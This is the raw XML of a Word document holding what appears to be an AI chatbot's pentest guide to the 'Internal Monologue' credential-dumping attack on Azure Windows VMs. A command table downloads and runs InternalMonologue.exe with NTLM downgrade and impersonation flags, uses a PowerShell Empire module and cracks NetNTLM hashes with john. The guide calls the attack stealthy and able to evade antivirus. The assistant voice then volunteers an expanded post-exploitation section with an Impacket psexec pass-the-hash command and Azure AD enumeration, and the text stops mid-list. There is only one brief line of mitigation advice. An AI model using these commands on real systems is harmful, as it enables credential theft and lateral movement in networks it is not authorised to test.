    </w:p>
    <w:p w14:paraId="20D1074C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Use Hash for Pass-the-Hash or Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11B246" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>With the hash, the attacker can authenticate to other systems without knowing the plaintext password, enabling lateral movement and privilege escalation within the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F0DBBA" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="281062C4">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2A6688" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure VM Vulnerabilities Exploited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAC41D4" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Legacy authentication enabled:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> NTLMv1 is either enabled or downgraded locally by attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66345D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insufficient endpoint protection:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> Allows execution of unsigned tools or PowerShell scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF39F2A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Registry writable:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> Allows temporary modification of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>LMCompatibilityLevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762DDDC1" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No MFA enforcement:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> Local or AD credentials alone provide access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A12A9A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Poor network segmentation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> Enables lateral movement once credentials are harvested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC2898" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="17A9C076">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE101C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary of Commands and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7885"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D399A" w:rsidRPr="0015249B" w14:paraId="2AB06D60" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="691CC12F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0015249B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F2C1F10" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0015249B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Commands / Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="0015249B" w14:paraId="6CAE4746" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D60B711" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t>Download executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="125BF40D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t>Invoke-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>WebRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015249B">
              <w:t xml:space="preserve"> -Uri &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>&gt; -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>OutFile</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015249B">
              <w:t xml:space="preserve"> InternalMonologue.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="0015249B" w14:paraId="2AF82EA3" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74F13D3D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t xml:space="preserve">Run </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>InternalMonologue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65C75441" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t>InternalMonologue.exe -Downgrade true -Threads true -Impersonate true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="0015249B" w14:paraId="5F6498C6" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E21E1B5" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t>PowerShell Empire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44DCA2F6" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>usemodule</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015249B">
              <w:t xml:space="preserve"> credentials/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>invoke_internal_monologue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015249B">
              <w:t xml:space="preserve"> + execute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D399A" w:rsidRPr="0015249B" w14:paraId="3C601E1E" w14:textId="77777777" w:rsidTr="0039559A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3145C2DD" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t>Crack Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C517771" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="0039559A">
            <w:r w:rsidRPr="0015249B">
              <w:t>john --format=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0015249B">
              <w:t>netntlm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0015249B">
              <w:t xml:space="preserve"> hash.txt --show</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4E70263C" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="66493EBD">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F77B49F" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E591605" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Internal Monologue attack is a stealthy alternative to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve"> for dumping credentials from Azure Windows VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAEAAFC" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>It bypasses many antivirus detections by invoking native Windows APIs rather than injecting malicious code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E27869" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t xml:space="preserve">Effective due to NTLM protocol weaknesses and registry </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>tweakability</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0015249B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10323F72" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0015249B">
        <w:t>Azure defenders should disable legacy NTLM versions, enforce MFA, monitor registry changes, and implement strong endpoint protections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B8B015" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="22F8CAA1">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32481442" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="0015249B" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="0015249B">
        <w:t>If you want, I can also provide detailed mitigation strategies or expand this with post-exploitation steps tailored for Azure AD / Microsoft Entra ID environments!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123E00EB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="6FB60226" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Great! Here’s an </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>expanded version including detailed post-exploitation steps tailored for Azure AD (Microsoft Entra ID) and mitigation strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> for this Internal Monologue </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> scenario on Azure Windows VMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D5049" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="3D824088">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="467DCA53" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expanded Internal Monologue Pentest Guide for Azure Windows VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C7A8C5" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Including Post-Exploitation on Azure AD (Microsoft Entra ID) and Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A26682" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="48F2642B">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11435402" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recap: Internal Monologue Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA8ED7" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Dumps </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>NetNTLM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> hashes by downgrading NTLM auth locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46BE33" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Extracts credentials stealthily without </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DFB7A2D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Works on local/AD accounts on Azure Windows VMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AED69" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r>
        <w:pict w14:anchorId="15F99965">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C29F8D" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post-Exploitation Steps for Azure AD / Microsoft Entra ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6FA5DB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Use Extracted Credentials for Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AC741" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pass-the-Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> tools (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>pth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">-toolkit, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Impacket’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> psexec.py) with dumped hashes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FAFCD5" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"># Example with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC2204A" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>psexec.py -hashes &lt;LMHASH&gt;:&lt;NTHASH&gt; domain\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022C5E">
        <w:t>raj@target-ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="085D9778" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t>Move laterally between Azure VMs joined to the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09888F3E" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Enumerate Azure AD / Entra ID Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EBFD49" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve">If the VM is Azure AD Joined or Hybrid Joined, use </w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure AD PowerShell modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00022C5E">
        <w:t xml:space="preserve"> to query info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660C977" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t># Connect to Azure AD (requires permissions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D9BF1" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t>Connect-AzureAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF451DB" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A"/>
    <w:p w14:paraId="63F50836" w14:textId="77777777" w:rsidR="003D399A" w:rsidRPr="00022C5E" w:rsidRDefault="003D399A" w:rsidP="003D399A">
      <w:r w:rsidRPr="00022C5E">
        <w:t># List users</w:t>
      </w:r>
    </w:p>
